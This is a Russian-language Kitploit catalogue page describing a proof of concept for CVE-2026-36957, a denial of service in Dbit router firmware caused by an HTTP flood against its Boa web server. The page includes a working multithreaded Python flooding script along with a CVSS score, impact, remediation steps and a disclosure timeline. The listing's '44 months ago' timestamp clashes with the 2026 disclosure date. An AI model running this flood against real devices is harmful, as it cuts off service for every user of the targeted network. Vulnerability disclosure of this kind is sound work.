Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/kirubel-cve/cve-2026-36957
Анализ уязвимостейЭксплуатацияВеб-безопасностьТестирование на Проникновение
GitHubkirubel-cve/cve-2026-36957

CVE-2026-36957

Доказательство концепции для CVE-2026-36957 — уязвимости типа «отказ в обслуживании» в прошивке маршрутизатора Dbit, вызванной HTTP-флудом на веб-сервер Boa, что приводит к исчерпанию ресурсов и зависанию системы.

Репозиторий
44 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-36957: Отказ в обслуживании через HTTP-флуд на веб-сервере Boa

CVE ID: CVE-2026-36957 Дата: 2026-04-29 Исследователь: Kirubel Solomne Производитель: Shenzhen Dibit Network Equipment Co., Ltd. Продукт: Dbit Router Версия прошивки: V1.0.0 CWE: CWE-400 — Неконтролируемое потребление ресурсов


Описание

Прошивка V1.0.0 маршрутизатора Dbit Router уязвима к отказу в обслуживании через обработчик URI веб-сервера Boa. Отправляя высокоинтенсивный флуд HTTP GET-запросов на несуществующие URI, злоумышленник может исчерпать критически важные системные ресурсы, включая файловые дескрипторы и буферы памяти. Это приводит к взаимоблокировке ядра или зависанию системы, что отключает веб-портал управления и все функции маршрутизации.


Оценка CVSS

Оценка CVSS v3.1: 7.5 (Высокая) CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

МетрикаЗначение
Вектор атакиСеть
Сложность атакиНизкая
Требуемые привилегииОтсутствуют
Взаимодействие с пользователемОтсутствует
Влияние на конфиденциальностьОтсутствует
Влияние на целостностьОтсутствует
Влияние на доступностьВысокое

Доказательство концепции

root@kitploit:~
import requests
import threading

TARGET = "http://192.168.10.1"

def flood(i):
    try:
        requests.get(f"{TARGET}/nonexistent_{i}", timeout=2)
    except:
        pass

threads = []
for i in range(1000):
    t = threading.Thread(target=flood, args=(i,))
    threads.append(t)
    t.start()

for t in threads:
    t.join()

print("Done. Check if router is still responsive.")

Ожидаемое поведение: Сервер должен ограничивать количество соединений и оставаться стабильным. Фактическое поведение: Веб-интерфейс маршрутизатора перестаёт отвечать; требуется ручная перезагрузка.


Влияние

  • Полная потеря веб-интерфейса управления
  • Нарушение всех функций маршрутизации
  • Требуется ручная перезагрузка для восстановления работы
  • Простой сети для всех подключённых устройств

Устранение

  • Внедрить ограничение скорости соединений на веб-сервере Boa
  • Добавить сторожевой таймер для восстановления после взаимоблокировок
  • Ограничить максимальное количество одновременных соединений с одного IP-адреса

График раскрытия

ДатаСобытие
2026-04-29Уязвимость обнаружена
2026-04-29Сообщено в MITRE
2026-04-29Присвоен CVE-2026-36957
2026-04-29Публичное раскрытие

Ссылки

  • MITRE CVE-2026-36957
  • CWE-400
  • Веб-сайт производителя
Скачать инструмент